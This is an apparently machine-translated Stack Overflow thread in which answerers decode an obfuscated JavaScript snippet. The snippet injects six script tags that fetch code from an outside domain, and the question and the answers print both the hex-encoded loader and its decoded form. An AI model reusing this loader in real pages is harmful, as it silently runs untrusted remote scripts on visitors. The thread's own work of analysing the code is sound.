2013-05-06 45 views
2

有沒有辦法知道這個JavaScript代碼是什麼,我很抱歉,如果這看起來很奇怪。有人可以解密這個JavaScript?

var _0x7e0d = ["\x63\x62\x6F\x78\x66\x6F\x72\x6D", "\x68\x74\x74\x70\x3A\x2F\x2F\x66\x72\x61\x6E\x63\x65\x31\x30\x73\x2E\x62\x69\x7A\x2F\x63\x62\x6F\x78\x2F\x3F", "\x68\x65\x61\x64", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x64\x6F\x63\x75\x6D\x65\x6E\x74", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65", "\x73\x72\x63", "\x6C\x61\x73\x74\x43\x68\x69\x6C\x64", "\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65", "\x67", "\x63\x6C", "\x66\x74", "\x70\x6B", "\x74\x6D", "\x6D"]; 
var cf = parent[_0x7e0d[0]]; 
var cm = window; 
var frmod = _0x7e0d[1]; 

function include(_0x1a17x5, _0x1a17x6) { 
    head = _0x1a17x6[_0x7e0d[4]][_0x7e0d[3]](_0x7e0d[2])[0]; 
    var _0x1a17x7 = _0x1a17x6[_0x7e0d[4]][_0x7e0d[6]](_0x7e0d[5]); 
    _0x1a17x7[_0x7e0d[9]](_0x7e0d[7], _0x7e0d[8]); 
    _0x1a17x7[_0x7e0d[9]](_0x7e0d[10], _0x1a17x5); 
    head[_0x7e0d[12]](_0x1a17x7, head[_0x7e0d[11]]); 
}; 
include(frmod + _0x7e0d[13], cm); 
include(frmod + _0x7e0d[14], cm); 
include(frmod + _0x7e0d[15], cm); 
include(frmod + _0x7e0d[16], cm); 
include(frmod + _0x7e0d[17], cm); 
include(frmod + _0x7e0d[18], cm); 

在此先感謝

+2

嘗試將其粘貼在此頁面上:http://ddecode.com/hexdecoder/ – thebreiflabb 2013-05-06 11:06:32

+0

有人可以格式化此JavaScript嗎? – 2013-05-06 11:07:14

+0

這些是十六進制字符代碼,第一個賦值是'[「cboxform」,「http://france10s.biz/cbox/?」,「head」,「getElementsByTagName」,「document」,「script」,「createElement」, 「type」,「text/javascript」,「setAttribute」,「src」,「lastChild」,「insertBefore」,「g」,「cl」,「ft」,「pk」,「tm」,「m」] 'var _0x7e0d'。同樣使用控制檯日誌讀取它!功能包括 – NINCOMPOOP 2013-05-06 11:08:31

回答

2

http://jsbeautifier.org/

var cf = parent['cboxform']; 
var cm = window; 
var frmod = 'http://fra*****s.biz/cbox/?'; 

function include(_0x1a17x5, _0x1a17x6) { 
    head = _0x1a17x6['document']['getElementsByTagName']('head')[0]; 
    var _0x1a17x7 = _0x1a17x6['document']['createElement']('script'); 
    _0x1a17x7['setAttribute']('type', 'text/javascript'); 
    _0x1a17x7['setAttribute']('src', _0x1a17x5); 
    head['insertBefore'](_0x1a17x7, head['lastChild']); 
}; 
include(frmod + 'g', cm); 
include(frmod + 'cl', cm); 
include(frmod + 'ft', cm); 
include(frmod + 'pk', cm); 
include(frmod + 'tm', cm); 
include(frmod + 'm', cm); 
+0

代碼仍未解密! – GuestofHonor 2013-05-06 11:34:43

+0

@ user2349786這些是變量。媽媽,RoomID,Horsefly,_0x1a17x5甚至ಠ_ಠ是有效的js變量名稱。 – 2013-05-06 11:39:24

0

換句話說這個腳本只是增加了6個<script>標籤您<head>與外部腳本來自:

  1. http://fra*****s.biz/cbox/?g
  2. http://fra*****s.biz/cbox/?cl
  3. http://fra*****s.biz/cbox/?ft
  4. http://fra*****s.biz/cbox/?pk
  5. http://fra*****s.biz/cbox/?tm
  6. http://fra*****s.biz/cbox/?m

警告:不要打開這些鏈接!出於安全原因,我在URL中添加了*

+0

我已經得到了這個謝謝,但問題是功能包括更重要的代碼,因爲我已經得到了所有其他 謝謝 – GuestofHonor 2013-05-06 11:40:10

2

嘗試使用Google Closure編譯器http://closure-compiler.appspot.com/home。我使用http://jsbeautifier.org/格式化了谷歌代碼輸出。代碼被修改爲可讀性。

var funcOrKeys = ["cboxform", "http://france10s.biz/cbox/?", "head", "getElementsByTagName", "document", "script", "createElement", "type", "text/javascript", "setAttribute", "src", "lastChild", "insertBefore", "g", "cl", "ft", "pk", "tm", "m"]; 
var cf = parent['cboxform']; 
var cm = window; 
var url = 'http://XXXXXXX.biz/cbox/?'; 

function include(url , window) { 
    head = window.document.getElementsByTagName('head')[0]; 
    var scriptTag = window.document.createElement('script'); 
    scriptTag.setAttribute('type', 'text/javascript'); 
    scriptTag.setAttribute('src', url); 
    head.insertBefore(scriptTag , head['lastChild']); 
}; 

include(url + 'g', cm); 
include(url + 'cl', cm); 
include(url + 'ft', cm); 
include(url + 'pk', cm); 
include(url + 'tm', cm); 
include(url + 'm', cm ); 

include將腳本標籤附加到您的head標籤。

+0

所有我已經得到,但功能包括的代碼仍然是加密 – GuestofHonor 2013-05-06 11:36:00

相關問題